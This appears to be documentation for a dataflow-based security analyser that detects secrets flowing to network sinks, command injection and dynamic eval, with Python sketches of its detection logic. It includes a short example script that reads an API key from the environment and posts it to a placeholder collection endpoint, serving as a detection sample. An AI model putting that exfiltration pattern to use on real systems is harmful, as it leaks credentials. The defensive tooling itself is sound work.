Pipeline · Phase 4

Behavioural Analysis — source → sink dataflow.

Phase 4 parses the file (Babel AST for JS/TS, regex extractors for the other languages) and tracks how data flows from sources (env vars, file reads, network responses) to sinks (network sends, command exec, `eval`). It catches what plain regex matching misses, such as a secret read in one statement and exfiltrated in another.
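To make the source → sink idea concrete, here is a minimal sketch of regex-based taint tracking for Python code. It is an illustration only, not the BehaviouralAnalyser implementation: the patterns and the `find_flows` helper are hypothetical and cover only a handful of sources and sinks.

```python
import re

# Hypothetical patterns for illustration; a real analyser would cover far more cases.
SOURCE = re.compile(r"os\.environ|os\.getenv\(|\bopen\(|requests\.get\(")
SINK = re.compile(r"\b(?:requests\.post|subprocess\.run|os\.system|eval)\s*\((?P<args>.*)\)")
ASSIGN = re.compile(r"^\s*(?P<name>[A-Za-z_]\w*)\s*=(?!=)\s*(?P<rhs>.+)$")
NAME = re.compile(r"[A-Za-z_]\w*")


def find_flows(code):
    """Return (variable, source_line, sink_line) for each tainted variable passed to a sink."""
    tainted = {}  # variable name -> line number where the taint originated
    flows = []
    for lineno, line in enumerate(code.splitlines(), start=1):
        stmt = line.split("#", 1)[0].rstrip()  # naive comment strip (ignores '#' in strings)
        assign = ASSIGN.match(stmt)
        if assign:
            rhs = assign["rhs"]
            if SOURCE.search(rhs):
                # Direct read from a source taints the assigned variable.
                tainted[assign["name"]] = lineno
            else:
                # Taint propagates through assignments that mention a tainted variable.
                for name in NAME.findall(rhs):
                    if name in tainted:
                        tainted[assign["name"]] = tainted[name]
                        break
        sink = SINK.search(stmt)
        if sink:
            for name in NAME.findall(sink["args"]):
                if name in tainted:
                    flows.append((name, tainted[name], lineno))
    return flows


sample = 'key = os.environ["API_KEY"]\nrequests.post(url, data=key)\n'
print(find_flows(sample))  # [('key', 1, 2)]
```

The point of the sketch is the two-step state: the read on line 1 and the send on line 2 are harmless on their own, and only the recorded taint connects them.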

Property	Value
Latency	<200ms
Scope	Write / Edit · 6 languages
Engine	BehaviouralAnalyser · 7 dataflow rules
Score weight	`scoring_weights.behavioural` — default 2.0 (heaviest)
Short-circuit	any CRITICAL finding → deny immediately
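
The short-circuit row can be pictured as follows. This is a sketch under assumptions: the `Finding` type, the `phase_verdict` function and the `"deny"` / `"continue"` return values are hypothetical names, not the analyser's real API.

```python
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str  # "CRITICAL", "HIGH" or "MEDIUM"


def phase_verdict(findings: Iterable[Finding]) -> str:
    """Return "deny" on the first CRITICAL finding, otherwise "continue"."""
    for finding in findings:
        if finding.severity == "CRITICAL":
            return "deny"  # short-circuit: later findings are never inspected
    return "continue"  # no CRITICAL finding, so the result goes on to scoring


findings = [Finding("CAPABILITY_EVAL", "HIGH"), Finding("DATAFLOW_EXFIL", "CRITICAL")]
print(phase_verdict(findings))  # deny
```

Accepting any iterable means a generator of findings can be passed in, so rules after the first CRITICAL hit need not run at all.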

Languages

Language	Parser	Extensions
JavaScript / TypeScript	Babel AST	.js .ts .jsx .tsx .mjs .cjs
Python	Regex	.py .pyw
Shell	Regex	.sh .bash .zsh .fish .ksh
Ruby	Regex	.rb .rake .gemspec
PHP	Regex	.php .phtml
Go	Regex	.go
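
As a rough sketch, the table above amounts to an extension lookup. The `parser_for` helper and the data layout are assumptions made for illustration; only the languages, parsers and extensions come from the table.

```python
from pathlib import PurePath

# (language, parser) -> extensions, copied from the table above.
PARSERS = {
    ("JavaScript / TypeScript", "Babel AST"): (".js", ".ts", ".jsx", ".tsx", ".mjs", ".cjs"),
    ("Python", "Regex"): (".py", ".pyw"),
    ("Shell", "Regex"): (".sh", ".bash", ".zsh", ".fish", ".ksh"),
    ("Ruby", "Regex"): (".rb", ".rake", ".gemspec"),
    ("PHP", "Regex"): (".php", ".phtml"),
    ("Go", "Regex"): (".go",),
}

# Flatten into extension -> (language, parser) for constant-time lookup.
EXT_TO_PARSER = {ext: key for key, exts in PARSERS.items() for ext in exts}


def parser_for(filename):
    """Return (language, parser) for a supported file, or None if out of scope."""
    return EXT_TO_PARSER.get(PurePath(filename).suffix.lower())


print(parser_for("src/app.tsx"))  # ('JavaScript / TypeScript', 'Babel AST')
print(parser_for("main.rs"))      # None
```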

The 7 dataflow rules

Rule	Severity	Detection
`DATAFLOW_EXFIL`	CRITICAL	Secret or credential flows to a network sink
`DATAFLOW_RCE`	CRITICAL	Network response flows to `eval` / `exec`
`DATAFLOW_CMD_INJECT`	HIGH	User input flows to a command execution sink
`DATAFLOW_EVAL`	HIGH	Data flows to `eval` / `Function` constructor
`CAPABILITY_C2`	HIGH	Skill/file has both exec + network capabilities
`CAPABILITY_EVAL`	HIGH	Skill/file uses dynamic code evaluation
`CROSS_FILE_FLOW`	MEDIUM	Data crosses file boundaries
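
Unlike the `DATAFLOW_*` rules, the two `CAPABILITY_*` rules look at what a file can do rather than at a specific path through it. A minimal sketch for Python input, assuming hypothetical regex patterns and a hypothetical `capability_findings` helper:

```python
import re

# Hypothetical capability patterns, for illustration only.
EXEC = re.compile(r"\b(?:subprocess\.\w+|os\.system|os\.popen)\s*\(")
NETWORK = re.compile(r"\b(?:requests\.\w+|urllib\.request\.\w+|socket\.socket)\s*\(")
DYNAMIC_EVAL = re.compile(r"(?<![\w.])(?:eval|exec)\s*\(")  # skips method calls like model.eval()


def capability_findings(code):
    """Return the CAPABILITY_* rule names that apply to the given source text."""
    findings = []
    # CAPABILITY_C2: the file can both run commands and talk to the network.
    if EXEC.search(code) and NETWORK.search(code):
        findings.append("CAPABILITY_C2")
    # CAPABILITY_EVAL: the file evaluates code dynamically.
    if DYNAMIC_EVAL.search(code):
        findings.append("CAPABILITY_EVAL")
    return findings


sample = "cmd = requests.get(u).text\nsubprocess.run(cmd, shell=True)\n"
print(capability_findings(sample))  # ['CAPABILITY_C2']
```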

Why it's the heaviest weight

Dataflow tracking has a very low false-positive rate compared to plain regex matching: a finding means the analyser traced an actual path from a sensitive source to a dangerous sink in the parsed file. That's why `scoring_weights.behavioural` defaults to 2.0 (vs 1.0 for runtime/static/llm). Turn it down only if you trust your code reviewers more than the analyser.
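
To see what the weight does in practice, here is a sketch that assumes phase scores lie in [0, 1] and are combined by weighted average. This page does not state the actual aggregation formula, so `combined_score` is a hypothetical stand-in; only the default weights come from the text above.

```python
# Default weights as described above; the aggregation formula is an assumption.
SCORING_WEIGHTS = {"behavioural": 2.0, "runtime": 1.0, "static": 1.0, "llm": 1.0}


def combined_score(phase_scores, weights=SCORING_WEIGHTS):
    """Weighted average of per-phase scores, each assumed to lie in [0, 1]."""
    total_weight = sum(weights[phase] for phase in phase_scores)
    weighted_sum = sum(weights[phase] * score for phase, score in phase_scores.items())
    return weighted_sum / total_weight


scores = {"behavioural": 0.75, "runtime": 0.25, "static": 0.25, "llm": 0.25}
default = combined_score(scores)                                 # 0.45
flat = combined_score(scores, {phase: 1.0 for phase in scores})  # 0.375
print(default, flat)
```

Under this assumption, a strong behavioural signal moves the combined score further than the same signal from any other phase would.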

Example

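# leak.py
import os
import requests
url = "https://example.com/collect"      # hypothetical endpoint, for illustration
key = os.environ["API_KEY"]              # source: secret read from the environment
requests.post(url, data=key)             # sink: secret sent over the network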

DATAFLOW_EXFIL · 0.88
